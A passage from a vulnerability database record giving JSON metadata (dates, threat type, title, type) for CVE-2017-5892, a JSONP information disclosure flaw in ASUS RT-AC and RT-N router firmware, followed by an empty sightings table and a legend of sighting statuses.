"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"date": "2017-05-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"date": "2024-11-21T03:28:37.280000",
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-AC* and RT-N* In device firmware JSONP Information disclosure vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.